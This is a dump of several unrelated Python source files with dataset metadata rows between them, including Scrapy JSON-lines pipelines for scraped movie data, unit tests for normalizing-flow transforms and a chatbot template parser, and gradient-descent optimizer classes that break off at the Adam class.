    """Append scraped people items (batch 10000) to ./data/movie_people10000.json as JSON lines."""

    def __init__(self):
        self.file = codecs.open('./data/movie_people10000.json', 'w', encoding='utf-8')

    def process_item(self, item, spider):
        """Serialize *item* as one JSON line; return it for downstream pipelines."""
        line = json.dumps(dict(item), ensure_ascii=False) + "\n"
        self.file.write(line)
        return item

    def close_spider(self, spider):
        # Fix: Scrapy calls close_spider() automatically; the original
        # spider_closed() was never invoked, leaking the file handle.
        self.file.close()

    # Backward-compatible alias for the old method name.
    spider_closed = close_spider
class MoviePeoplePipeline15000(object):
    """Append scraped people items (batch 15000) to ./data/movie_people15000.json as JSON lines."""

    def __init__(self):
        self.file = codecs.open('./data/movie_people15000.json', 'w', encoding='utf-8')

    def process_item(self, item, spider):
        """Serialize *item* as one JSON line; return it for downstream pipelines."""
        line = json.dumps(dict(item), ensure_ascii=False) + "\n"
        self.file.write(line)
        return item

    def close_spider(self, spider):
        # Fix: Scrapy calls close_spider() automatically; the original
        # spider_closed() was never invoked, leaking the file handle.
        self.file.close()

    # Backward-compatible alias for the old method name.
    spider_closed = close_spider
class MoviePeoplePipeline20000(object):
    """Append scraped people items (batch 20000) to ./data/movie_people20000.json as JSON lines."""

    def __init__(self):
        self.file = codecs.open('./data/movie_people20000.json', 'w', encoding='utf-8')

    def process_item(self, item, spider):
        """Serialize *item* as one JSON line; return it for downstream pipelines."""
        line = json.dumps(dict(item), ensure_ascii=False) + "\n"
        self.file.write(line)
        return item

    def close_spider(self, spider):
        # Fix: Scrapy calls close_spider() automatically; the original
        # spider_closed() was never invoked, leaking the file handle.
        self.file.close()

    # Backward-compatible alias for the old method name.
    spider_closed = close_spider
class MoviePeoplePipeline25000(object):
    """Append scraped people items (batch 25000) to ./data/movie_people25000.json as JSON lines."""

    def __init__(self):
        self.file = codecs.open('./data/movie_people25000.json', 'w', encoding='utf-8')

    def process_item(self, item, spider):
        """Serialize *item* as one JSON line; return it for downstream pipelines."""
        line = json.dumps(dict(item), ensure_ascii=False) + "\n"
        self.file.write(line)
        return item

    def close_spider(self, spider):
        # Fix: Scrapy calls close_spider() automatically; the original
        # spider_closed() was never invoked, leaking the file handle.
        self.file.close()

    # Backward-compatible alias for the old method name.
    spider_closed = close_spider
class MoviePeoplePipeline30000(object):
    """Append scraped people items (batch 30000) to ./data/movie_people30000.json as JSON lines."""

    def __init__(self):
        self.file = codecs.open('./data/movie_people30000.json', 'w', encoding='utf-8')

    def process_item(self, item, spider):
        """Serialize *item* as one JSON line; return it for downstream pipelines."""
        line = json.dumps(dict(item), ensure_ascii=False) + "\n"
        self.file.write(line)
        return item

    def close_spider(self, spider):
        # Fix: Scrapy calls close_spider() automatically; the original
        # spider_closed() was never invoked, leaking the file handle.
        self.file.close()

    # Backward-compatible alias for the old method name.
    spider_closed = close_spider
class MoviePeoplePipeline35000(object):
    """Append scraped people items (batch 35000) to ./data/movie_people35000.json as JSON lines."""

    def __init__(self):
        self.file = codecs.open('./data/movie_people35000.json', 'w', encoding='utf-8')

    def process_item(self, item, spider):
        """Serialize *item* as one JSON line; return it for downstream pipelines."""
        line = json.dumps(dict(item), ensure_ascii=False) + "\n"
        self.file.write(line)
        return item

    def close_spider(self, spider):
        # Fix: Scrapy calls close_spider() automatically; the original
        # spider_closed() was never invoked, leaking the file handle.
        self.file.close()

    # Backward-compatible alias for the old method name.
    spider_closed = close_spider
class MoviePeoplePipeline40000(object):
    """Append scraped people items (batch 40000) to ./data/movie_people40000.json as JSON lines."""

    def __init__(self):
        self.file = codecs.open('./data/movie_people40000.json', 'w', encoding='utf-8')

    def process_item(self, item, spider):
        """Serialize *item* as one JSON line; return it for downstream pipelines."""
        line = json.dumps(dict(item), ensure_ascii=False) + "\n"
        self.file.write(line)
        return item

    def close_spider(self, spider):
        # Fix: Scrapy calls close_spider() automatically; the original
        # spider_closed() was never invoked, leaking the file handle.
        self.file.close()

    # Backward-compatible alias for the old method name.
    spider_closed = close_spider
################ Comment ####################
class MovieCommentPipeline20(object):
    """Append scraped comment items (movies 1-20) to ./data/movie_comment20.json as JSON lines."""

    def __init__(self):
        self.file = codecs.open('./data/movie_comment20.json', 'w', encoding='utf-8')

    def process_item(self, item, spider):
        """Serialize *item* as one JSON line; return it for downstream pipelines."""
        line = json.dumps(dict(item), ensure_ascii=False) + "\n"
        self.file.write(line)
        return item

    def close_spider(self, spider):
        # Fix: Scrapy calls close_spider() automatically; the original
        # spider_closed() was never invoked, leaking the file handle.
        self.file.close()

    # Backward-compatible alias for the old method name.
    spider_closed = close_spider
class MovieCommentPipeline40(object):
    """Append scraped comment items (movies 21-40) to ./data/movie_comment40.json as JSON lines."""

    def __init__(self):
        self.file = codecs.open('./data/movie_comment40.json', 'w', encoding='utf-8')

    def process_item(self, item, spider):
        """Serialize *item* as one JSON line; return it for downstream pipelines."""
        line = json.dumps(dict(item), ensure_ascii=False) + "\n"
        self.file.write(line)
        return item

    def close_spider(self, spider):
        # Fix: Scrapy calls close_spider() automatically; the original
        # spider_closed() was never invoked, leaking the file handle.
        self.file.close()

    # Backward-compatible alias for the old method name.
    spider_closed = close_spider
class MovieCommentPipeline60(object):
    """Append scraped comment items (movies 41-60) to ./data/movie_comment60.json as JSON lines."""

    def __init__(self):
        self.file = codecs.open('./data/movie_comment60.json', 'w', encoding='utf-8')

    def process_item(self, item, spider):
        """Serialize *item* as one JSON line; return it for downstream pipelines."""
        line = json.dumps(dict(item), ensure_ascii=False) + "\n"
        self.file.write(line)
        return item

    def close_spider(self, spider):
        # Fix: Scrapy calls close_spider() automatically; the original
        # spider_closed() was never invoked, leaking the file handle.
        self.file.close()

    # Backward-compatible alias for the old method name.
    spider_closed = close_spider
class MovieCommentPipeline80(object):
    """Append scraped comment items (movies 61-80) to ./data/movie_comment80.json as JSON lines."""

    def __init__(self):
        self.file = codecs.open('./data/movie_comment80.json', 'w', encoding='utf-8')

    def process_item(self, item, spider):
        """Serialize *item* as one JSON line; return it for downstream pipelines."""
        line = json.dumps(dict(item), ensure_ascii=False) + "\n"
        self.file.write(line)
        return item

    def close_spider(self, spider):
        # Fix: Scrapy calls close_spider() automatically; the original
        # spider_closed() was never invoked, leaking the file handle.
        self.file.close()

    # Backward-compatible alias for the old method name.
    spider_closed = close_spider
class MovieCommentPipeline100(object):
    """Append scraped comment items (movies 81-100) to ./data/movie_comment100.json as JSON lines."""

    def __init__(self):
        self.file = codecs.open('./data/movie_comment100.json', 'w', encoding='utf-8')

    def process_item(self, item, spider):
        """Serialize *item* as one JSON line; return it for downstream pipelines."""
        line = json.dumps(dict(item), ensure_ascii=False) + "\n"
        self.file.write(line)
        return item

    def close_spider(self, spider):
        # Fix: Scrapy calls close_spider() automatically; the original
        # spider_closed() was never invoked, leaking the file handle.
        self.file.close()

    # Backward-compatible alias for the old method name.
    spider_closed = close_spider
class MovieCommentPipeline120(object):
    """Append scraped comment items (movies 101-120) to ./data/movie_comment120.json as JSON lines."""

    def __init__(self):
        self.file = codecs.open('./data/movie_comment120.json', 'w', encoding='utf-8')

    def process_item(self, item, spider):
        """Serialize *item* as one JSON line; return it for downstream pipelines."""
        line = json.dumps(dict(item), ensure_ascii=False) + "\n"
        self.file.write(line)
        return item

    def close_spider(self, spider):
        # Fix: Scrapy calls close_spider() automatically; the original
        # spider_closed() was never invoked, leaking the file handle.
        self.file.close()

    # Backward-compatible alias for the old method name.
    spider_closed = close_spider
class MovieCommentPipeline140(object):
    """Append scraped comment items (movies 121-140) to ./data/movie_comment140.json as JSON lines."""

    def __init__(self):
        self.file = codecs.open('./data/movie_comment140.json', 'w', encoding='utf-8')

    def process_item(self, item, spider):
        """Serialize *item* as one JSON line; return it for downstream pipelines."""
        line = json.dumps(dict(item), ensure_ascii=False) + "\n"
        self.file.write(line)
        return item

    def close_spider(self, spider):
        # Fix: Scrapy calls close_spider() automatically; the original
        # spider_closed() was never invoked, leaking the file handle.
        self.file.close()

    # Backward-compatible alias for the old method name.
    spider_closed = close_spider
class MovieCommentPipeline160(object):
    """Append scraped comment items (movies 141-160) to ./data/movie_comment160.json as JSON lines."""

    def __init__(self):
        self.file = codecs.open('./data/movie_comment160.json', 'w', encoding='utf-8')

    def process_item(self, item, spider):
        """Serialize *item* as one JSON line; return it for downstream pipelines."""
        line = json.dumps(dict(item), ensure_ascii=False) + "\n"
        self.file.write(line)
        return item

    def close_spider(self, spider):
        # Fix: Scrapy calls close_spider() automatically; the original
        # spider_closed() was never invoked, leaking the file handle.
        self.file.close()

    # Backward-compatible alias for the old method name.
    spider_closed = close_spider
class MovieCommentPipeline180(object):
    """Append scraped comment items (movies 161-180) to ./data/movie_comment180.json as JSON lines."""

    def __init__(self):
        self.file = codecs.open('./data/movie_comment180.json', 'w', encoding='utf-8')

    def process_item(self, item, spider):
        """Serialize *item* as one JSON line; return it for downstream pipelines."""
        line = json.dumps(dict(item), ensure_ascii=False) + "\n"
        self.file.write(line)
        return item

    def close_spider(self, spider):
        # Fix: Scrapy calls close_spider() automatically; the original
        # spider_closed() was never invoked, leaking the file handle.
        self.file.close()

    # Backward-compatible alias for the old method name.
    spider_closed = close_spider
class MovieCommentPipeline200(object):
    """Append scraped comment items (movies 181-200) to ./data/movie_comment200.json as JSON lines."""

    def __init__(self):
        self.file = codecs.open('./data/movie_comment200.json', 'w', encoding='utf-8')

    def process_item(self, item, spider):
        """Serialize *item* as one JSON line; return it for downstream pipelines."""
        line = json.dumps(dict(item), ensure_ascii=False) + "\n"
        self.file.write(line)
        return item

    def close_spider(self, spider):
        # Fix: Scrapy calls close_spider() automatically; the original
        # spider_closed() was never invoked, leaking the file handle.
        self.file.close()

    # Backward-compatible alias for the old method name.
    spider_closed = close_spider
class MovieCommentPipeline225(object):
    """Append scraped comment items (movies 201-225) to ./data/movie_comment225.json as JSON lines."""

    def __init__(self):
        self.file = codecs.open('./data/movie_comment225.json', 'w', encoding='utf-8')

    def process_item(self, item, spider):
        """Serialize *item* as one JSON line; return it for downstream pipelines."""
        line = json.dumps(dict(item), ensure_ascii=False) + "\n"
        self.file.write(line)
        return item

    def close_spider(self, spider):
        # Fix: Scrapy calls close_spider() automatically; the original
        # spider_closed() was never invoked, leaking the file handle.
        self.file.close()

    # Backward-compatible alias for the old method name.
    spider_closed = close_spider
class MovieCommentPipeline250(object):
    """Append scraped comment items (movies 226-250) to ./data/movie_comment250.json as JSON lines."""

    def __init__(self):
        self.file = codecs.open('./data/movie_comment250.json', 'w', encoding='utf-8')

    def process_item(self, item, spider):
        """Serialize *item* as one JSON line; return it for downstream pipelines."""
        line = json.dumps(dict(item), ensure_ascii=False) + "\n"
        self.file.write(line)
        return item

    def close_spider(self, spider):
        # Fix: Scrapy calls close_spider() automatically; the original
        # spider_closed() was never invoked, leaking the file handle.
        self.file.close()

    # Backward-compatible alias for the old method name.
    spider_closed = close_spider
| 35.590164
| 87
| 0.63427
| 1,088
| 8,684
| 4.899816
| 0.096507
| 0.099043
| 0.053648
| 0.070156
| 0.810167
| 0.810167
| 0.810167
| 0.810167
| 0.810167
| 0.810167
| 0
| 0.025607
| 0.217526
| 8,684
| 243
| 88
| 35.736626
| 0.75894
| 0.02257
| 0
| 0.754902
| 0
| 0
| 0.093958
| 0.073026
| 0
| 0
| 0
| 0
| 0
| 1
| 0.323529
| false
| 0
| 0.029412
| 0
| 0.568627
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 9
|
60a8beb5b9e97782258e868142d32c50e1260e96
| 241
|
py
|
Python
|
src/sandbox/runner_errors.py
|
ospiper/Sandbox-Runner
|
d6a463fa7744ea2a88553eef197b6f8a9f4d91f0
|
[
"MIT"
] | null | null | null |
src/sandbox/runner_errors.py
|
ospiper/Sandbox-Runner
|
d6a463fa7744ea2a88553eef197b6f8a9f4d91f0
|
[
"MIT"
] | null | null | null |
src/sandbox/runner_errors.py
|
ospiper/Sandbox-Runner
|
d6a463fa7744ea2a88553eef197b6f8a9f4d91f0
|
[
"MIT"
] | null | null | null |
class RunnerException(Exception):
    """Base class for sandbox-runner errors.

    Keeps *message* on the instance for subclass formatting (see
    ArgumentError.__str__) and also forwards it to Exception.__init__.
    """

    def __init__(self, message=''):
        # Fix: the original called super().__init__() with no arguments,
        # so str(exc) and exc.args silently dropped the message.
        super().__init__(message)
        self.message = message
class ArgumentError(RunnerException):
    """RunnerException variant whose string form is prefixed with the error kind."""

    def __str__(self):
        rendered = 'ArgumentError: %s' % self.message
        return rendered
| 24.1
| 49
| 0.6639
| 23
| 241
| 6.434783
| 0.521739
| 0.222973
| 0.202703
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.215768
| 241
| 9
| 50
| 26.777778
| 0.783069
| 0
| 0
| 0
| 0
| 0
| 0.070539
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.285714
| false
| 0
| 0
| 0.142857
| 0.714286
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
60bdc6d0dea391a60f80b69d77ada0b2711b82c6
| 3,825
|
py
|
Python
|
tests/transforms/standard_test.py
|
Tennessee-Wallaceh/nflows
|
ac0bf432fc7904458a933ed14180f0ac26e3f93d
|
[
"MIT"
] | 522
|
2020-02-26T16:51:51.000Z
|
2022-03-31T15:38:48.000Z
|
tests/transforms/standard_test.py
|
Tennessee-Wallaceh/nflows
|
ac0bf432fc7904458a933ed14180f0ac26e3f93d
|
[
"MIT"
] | 47
|
2020-03-24T18:36:59.000Z
|
2022-03-25T09:47:18.000Z
|
tests/transforms/standard_test.py
|
Tennessee-Wallaceh/nflows
|
ac0bf432fc7904458a933ed14180f0ac26e3f93d
|
[
"MIT"
] | 77
|
2020-03-21T21:00:44.000Z
|
2022-03-31T00:41:51.000Z
|
"""Tests for the standard transforms."""
import unittest
import numpy as np
import torch
from nflows.transforms import standard
from tests.transforms.transform_test import TransformTest
class IdentityTransformTest(TransformTest):
    """IdentityTransform must pass data through unchanged with a zero log-abs-det."""

    def test_forward(self):
        n, event_shape = 10, [2, 3, 4]
        x = torch.randn(n, *event_shape)
        y, ladj = standard.IdentityTransform()(x)
        self.assert_tensor_is_good(y, [n] + event_shape)
        self.assert_tensor_is_good(ladj, [n])
        self.assertEqual(y, x)
        self.assertEqual(ladj, torch.zeros(n))

    def test_inverse(self):
        n, event_shape = 10, [2, 3, 4]
        x = torch.randn(n, *event_shape)
        y, ladj = standard.IdentityTransform().inverse(x)
        self.assert_tensor_is_good(y, [n] + event_shape)
        self.assert_tensor_is_good(ladj, [n])
        self.assertEqual(y, x)
        self.assertEqual(ladj, torch.zeros(n))

    def test_forward_inverse_are_consistent(self):
        x = torch.randn(10, 2, 3, 4)
        self.assert_forward_inverse_are_consistent(standard.IdentityTransform(), x)
class AffineScalarTransformTest(TransformTest):
    """AffineScalarTransform: elementwise x * scale + shift and its inverse."""

    def test_forward(self):
        n, event_shape = 10, [2, 3, 4]
        x = torch.randn(n, *event_shape)

        def check(scale, shift, want_outputs, want_logabsdet):
            # subTest reports each (scale, shift) case independently.
            with self.subTest(scale=scale, shift=shift):
                y, ladj = standard.AffineScalarTransform(scale=scale, shift=shift)(x)
                self.assert_tensor_is_good(y, [n] + event_shape)
                self.assert_tensor_is_good(ladj, [n])
                self.assertEqual(y, want_outputs)
                # Per-element logabsdet is summed over the event dimensions.
                self.assertEqual(
                    ladj, torch.full([n], want_logabsdet * np.prod(event_shape))
                )

        self.eps = 1e-6
        check(None, 2.0, x + 2.0, 0.)
        check(2.0, None, x * 2.0, np.log(2.0))
        check(2.0, 2.0, x * 2.0 + 2.0, np.log(2.0))

    def test_inverse(self):
        n, event_shape = 10, [2, 3, 4]
        x = torch.randn(n, *event_shape)

        def check(scale, shift, want_outputs, want_logabsdet):
            with self.subTest(scale=scale, shift=shift):
                y, ladj = standard.AffineScalarTransform(scale=scale, shift=shift).inverse(x)
                self.assert_tensor_is_good(y, [n] + event_shape)
                self.assert_tensor_is_good(ladj, [n])
                self.assertEqual(y, want_outputs)
                self.assertEqual(
                    ladj, torch.full([n], want_logabsdet * np.prod(event_shape))
                )

        self.eps = 1e-6
        check(None, 2.0, x - 2.0, 0.)
        check(2.0, None, x / 2.0, -np.log(2.0))
        check(2.0, 2.0, (x - 2.0) / 2.0, -np.log(2.0))

    def test_forward_inverse_are_consistent(self):
        x = torch.randn(10, 2, 3, 4)

        def check(scale, shift):
            transform = standard.AffineScalarTransform(scale=scale, shift=shift)
            self.assert_forward_inverse_are_consistent(transform, x)

        self.eps = 1e-6
        check(None, 2.0)
        check(2.0, None)
        check(2.0, 2.0)
# Allow running this test module directly (e.g. `python standard_test.py`).
if __name__ == "__main__":
    unittest.main()
| 37.135922
| 88
| 0.627451
| 469
| 3,825
| 4.910448
| 0.130064
| 0.093791
| 0.06079
| 0.062527
| 0.899262
| 0.899262
| 0.887972
| 0.887972
| 0.817629
| 0.807208
| 0
| 0.030594
| 0.265098
| 3,825
| 102
| 89
| 37.5
| 0.788687
| 0.008889
| 0
| 0.743902
| 0
| 0
| 0.002114
| 0
| 0
| 0
| 0
| 0
| 0.219512
| 1
| 0.109756
| false
| 0
| 0.060976
| 0
| 0.195122
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7150e5caa533bc0178550dd34a75f1d589d55718
| 68
|
py
|
Python
|
recognizer/networks/__init__.py
|
hemanth346/number-recognizer
|
9a3354fd4c2b1d5746f3c09b7fbc83ca75239b6a
|
[
"Apache-2.0"
] | null | null | null |
recognizer/networks/__init__.py
|
hemanth346/number-recognizer
|
9a3354fd4c2b1d5746f3c09b7fbc83ca75239b6a
|
[
"Apache-2.0"
] | null | null | null |
recognizer/networks/__init__.py
|
hemanth346/number-recognizer
|
9a3354fd4c2b1d5746f3c09b7fbc83ca75239b6a
|
[
"Apache-2.0"
] | null | null | null |
# Public network registry for the recognizer package: each submodule
# exposes its model class as `Net`, re-exported here under a short alias.
from .cnn_7k import Net as cnn7k
# NOTE(review): the module is cnn_13k but the alias says cnn14k — confirm
# which parameter count is correct before relying on the alias name.
from .cnn_13k import Net as cnn14k
| 22.666667
| 34
| 0.794118
| 14
| 68
| 3.714286
| 0.642857
| 0.269231
| 0.423077
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.107143
| 0.176471
| 68
| 2
| 35
| 34
| 0.821429
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
718513f97667021c9b49798c95ccbd4592506a2b
| 4,094
|
py
|
Python
|
src/test/parser/template/graph/test_get.py
|
hiitsme123/python
|
e08309fe61fd5ed88cfb39e9f402613dd7e39269
|
[
"MIT"
] | 5
|
2017-02-03T07:38:45.000Z
|
2022-01-06T11:29:29.000Z
|
src/test/parser/template/graph/test_get.py
|
hiitsme123/python
|
e08309fe61fd5ed88cfb39e9f402613dd7e39269
|
[
"MIT"
] | 8
|
2017-02-03T06:59:03.000Z
|
2017-04-28T14:23:46.000Z
|
src/test/parser/template/graph/test_get.py
|
hiitsme123/python
|
e08309fe61fd5ed88cfb39e9f402613dd7e39269
|
[
"MIT"
] | 8
|
2017-02-02T15:12:12.000Z
|
2017-04-02T13:35:03.000Z
|
import unittest
import xml.etree.ElementTree as ET
from programy.parser.template.nodes.base import TemplateNode
from programy.parser.template.nodes.get import TemplateGetNode
from test.parser.template.graph.test_graph_client import TemplateGraphTestClient
class TemplateGraphGetTests(TemplateGraphTestClient):
    """Graph-parser tests for the <get> template node.

    Each test parses a small <template> XML fragment and checks that the
    resulting AST contains a TemplateGetNode with the expected resolved
    name and local/global flag.  The parse/assert boilerplate that the
    original tests repeated five times is factored into the two private
    helpers below; the public test method names are unchanged.
    """

    def _parse_template(self, xml_text):
        """Parse *xml_text* into a template AST and sanity-check the root."""
        template = ET.fromstring(xml_text)
        ast = self.parser.parse_template_expression(template)
        self.assertIsNotNone(ast)
        self.assertIsInstance(ast, TemplateNode)
        self.assertIsNotNone(ast.children)
        return ast

    def _assert_get_node(self, get_node, expected_name, expected_local):
        """Assert *get_node* is a TemplateGetNode resolving to *expected_name*.

        ``expected_local`` is True for <get var=...>/<var> (local variable)
        and False for <get name=...>/<name> (predicate).
        """
        self.assertIsNotNone(get_node)
        self.assertIsInstance(get_node, TemplateGetNode)
        self.assertIsNotNone(get_node.name)
        self.assertIsInstance(get_node.name, TemplateNode)
        self.assertEqual(get_node.name.resolve(None, None), expected_name)
        if expected_local:
            self.assertTrue(get_node.local)
        else:
            self.assertFalse(get_node.local)

    def test_get_template_predicate_as_attrib(self):
        ast = self._parse_template("""
            <template>
                <get name="somepred" />
            </template>
            """)
        self.assertEqual(len(ast.children), 1)
        self._assert_get_node(ast.children[0], "somepred", expected_local=False)

    def test_get_template_predicate_as_attrib_mixed(self):
        # Surrounding text becomes additional word nodes: <get> is child 1 of 5.
        ast = self._parse_template("""
            <template>
                Hello <get name="somepred" /> how are you
            </template>
            """)
        self.assertEqual(len(ast.children), 5)
        self._assert_get_node(ast.children[1], "somepred", expected_local=False)

    def test_get_template_var_as_attrib(self):
        ast = self._parse_template("""
            <template>
                <get var="somevar" />
            </template>
            """)
        self.assertEqual(len(ast.children), 1)
        self._assert_get_node(ast.children[0], "somevar", expected_local=True)

    def test_get_template_predicate_as_child(self):
        ast = self._parse_template("""
            <template>
                <get><name>somepred as text</name></get>
            </template>
            """)
        self.assertEqual(len(ast.children), 1)
        self._assert_get_node(ast.children[0], "somepred as text", expected_local=False)

    def test_get_template_local_as_child(self):
        ast = self._parse_template("""
            <template>
                <get><var>somevar</var></get>
            </template>
            """)
        self.assertEqual(len(ast.children), 1)
        self._assert_get_node(ast.children[0], "somevar", expected_local=True)
# Allow running this test module directly from the command line.
if __name__ == '__main__':
    unittest.main()
| 35.912281
| 80
| 0.691988
| 450
| 4,094
| 6.115556
| 0.126667
| 0.089026
| 0.059956
| 0.094477
| 0.886628
| 0.852471
| 0.852471
| 0.84048
| 0.763445
| 0.732558
| 0
| 0.003053
| 0.199805
| 4,094
| 113
| 81
| 36.230089
| 0.836996
| 0
| 0
| 0.785714
| 0
| 0
| 0.097215
| 0.007084
| 0
| 0
| 0
| 0
| 0.510204
| 1
| 0.05102
| false
| 0
| 0.05102
| 0
| 0.112245
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
e085a42cbb4998c61c57958928bd8d5393f9bdd0
| 7,255
|
py
|
Python
|
pykitml/optimizers.py
|
RainingComputers/pykitml
|
1c3e50cebcdb6c4da63979ef9a812b44d23a4857
|
[
"MIT"
] | 34
|
2020-03-06T07:53:43.000Z
|
2022-03-13T06:12:29.000Z
|
pykitml/optimizers.py
|
RainingComputers/pykitml
|
1c3e50cebcdb6c4da63979ef9a812b44d23a4857
|
[
"MIT"
] | 6
|
2021-06-08T22:43:23.000Z
|
2022-03-08T13:57:33.000Z
|
pykitml/optimizers.py
|
RainingComputers/pykitml
|
1c3e50cebcdb6c4da63979ef9a812b44d23a4857
|
[
"MIT"
] | 1
|
2020-11-30T21:20:32.000Z
|
2020-11-30T21:20:32.000Z
|
from abc import ABC, abstractmethod
import numpy as np
'''
Optimizers module,
REF: http://cs231n.github.io/neural-networks-3/
'''
class Optimizer(ABC):
    """Abstract base class shared by all optimizers.

    Concrete optimizers expose their learning/decay rates through the
    ``_mlearning_rate`` and ``_mdecay_rate`` properties and implement
    ``_optimize`` to produce the updated parameter.
    """

    @abstractmethod
    def _optimize(self, parameter, parameter_gradient):
        # Return the parameter after applying one update step.
        pass

    @property
    @abstractmethod
    def _mlearning_rate(self):
        pass

    @_mlearning_rate.setter
    @abstractmethod
    def _mlearning_rate(self, learning_rate):
        pass

    @property
    @abstractmethod
    def _mdecay_rate(self):
        pass

    def _decay(self):
        # Shrink the learning rate by the optimizer's decay factor.
        self._mlearning_rate = self._mlearning_rate * self._mdecay_rate
class GradientDescent(Optimizer):
    """Plain (stochastic) gradient descent.

    Moves each parameter against its gradient, scaled by the learning rate.
    """

    def __init__(self, learning_rate, decay_rate=1):
        '''
        Parameters
        ----------
        learning_rate : float
        decay_rate : float
            Decay rate for learning rate
        '''
        self._learning_rate = learning_rate
        self._decay_rate = decay_rate

    @property
    def _mdecay_rate(self):
        return self._decay_rate

    @property
    def _mlearning_rate(self):
        return self._learning_rate

    @_mlearning_rate.setter
    def _mlearning_rate(self, learning_rate):
        self._learning_rate = learning_rate

    def _optimize(self, parameter, parameter_gradient):
        # Single SGD step: move against the gradient.
        step = self._learning_rate * parameter_gradient
        return parameter - step
class Momentum(Optimizer):
    """Gradient descent with classical momentum.

    Maintains a running velocity ``_v`` that blends the previous velocity
    with the current gradient step.
    """

    def __init__(self, learning_rate, decay_rate=1, beta=0.9):
        '''
        Parameters
        ----------
        learning_rate : float
        decay_rate : float
            Decay rate for learning rate
        beta : float
            Should be between 0 to 1.
        '''
        self._learning_rate = learning_rate
        self._decay_rate = decay_rate
        self._beta = beta
        # Velocity accumulator, updated on every _optimize call.
        self._v = 0

    @property
    def _mdecay_rate(self):
        return self._decay_rate

    @property
    def _mlearning_rate(self):
        return self._learning_rate

    @_mlearning_rate.setter
    def _mlearning_rate(self, learning_rate):
        self._learning_rate = learning_rate

    def _optimize(self, parameter, parameter_gradient):
        # Blend previous velocity with the new gradient step.
        self._v = self._beta * self._v - self._learning_rate * parameter_gradient
        # Step the parameter along the velocity.
        return parameter + self._v
class Nesterov(Optimizer):
    """Gradient descent with Nesterov momentum.

    Like classical momentum, but applies the look-ahead correction
    ``-beta*v_prev + (1+beta)*v`` to the parameter update.
    """

    def __init__(self, learning_rate, decay_rate=1, beta=0.9):
        '''
        Parameters
        ----------
        learning_rate : float
        decay_rate : float
            Decay rate for learning rate
        beta : float
            Should be between 0 to 1.
        '''
        self._learning_rate = learning_rate
        self._decay_rate = decay_rate
        self._beta = beta
        # Current and previous velocity accumulators.
        self._v = 0
        self._v_prev = 0

    @property
    def _mdecay_rate(self):
        return self._decay_rate

    @property
    def _mlearning_rate(self):
        return self._learning_rate

    @_mlearning_rate.setter
    def _mlearning_rate(self, learning_rate):
        self._learning_rate = learning_rate

    def _optimize(self, parameter, parameter_gradient):
        # Remember the old velocity before integrating the new one.
        self._v_prev = self._v
        self._v = self._beta * self._v - self._learning_rate * parameter_gradient
        # Nesterov look-ahead correction.
        return parameter - self._beta * self._v_prev + (1 + self._beta) * self._v
class Adagrad(Optimizer):
    """Adagrad optimizer.

    Accumulates squared gradients in ``_cache`` and scales each update by
    the inverse square root of that running total.
    """

    def __init__(self, learning_rate, decay_rate=1):
        '''
        Parameters
        ----------
        learning_rate : float
        decay_rate : float
            Decay rate for learning rate
        '''
        self._learning_rate = learning_rate
        self._decay_rate = decay_rate
        # Running sum of squared gradients.
        self._cache = 0

    @property
    def _mdecay_rate(self):
        return self._decay_rate

    @property
    def _mlearning_rate(self):
        return self._learning_rate

    @_mlearning_rate.setter
    def _mlearning_rate(self, learning_rate):
        self._learning_rate = learning_rate

    def _optimize(self, parameter, parameter_gradient):
        # Numerical-stability constant (10e-8, i.e. 1e-7).
        stability = 10e-8
        # Accumulate the squared gradient.
        self._cache = self._cache + parameter_gradient**2
        # Scale the step by the root of the accumulated cache.
        step = -self._learning_rate * parameter_gradient
        return parameter + step / ((self._cache**0.5) + stability)
class RMSprop(Optimizer):
    """RMSprop optimizer.

    Keeps an exponentially decaying average of squared gradients and
    normalizes each step by its square root.
    """

    def __init__(self, learning_rate, decay_rate=1, beta=0.9):
        '''
        Parameters
        ----------
        learning_rate : float
        decay_rate : float
            Decay rate for learning rate
        beta : float
            Should be between 0 to 1.
        '''
        self._learning_rate = learning_rate
        self._decay_rate = decay_rate
        self._beta = beta
        # Decaying average of squared gradients.
        self._cache = 0

    @property
    def _mdecay_rate(self):
        return self._decay_rate

    @property
    def _mlearning_rate(self):
        return self._learning_rate

    @_mlearning_rate.setter
    def _mlearning_rate(self, learning_rate):
        self._learning_rate = learning_rate

    def _optimize(self, parameter, parameter_gradient):
        # Numerical-stability constant (10e-8, i.e. 1e-7).
        stability = 10e-8
        # Exponential moving average of the squared gradient.
        self._cache = self._beta * self._cache + (1 - self._beta) * (parameter_gradient**2)
        # Normalize the step by the RMS of recent gradients.
        step = -self._learning_rate * parameter_gradient
        return parameter + step / ((self._cache**0.5) + stability)
class Adam(Optimizer):
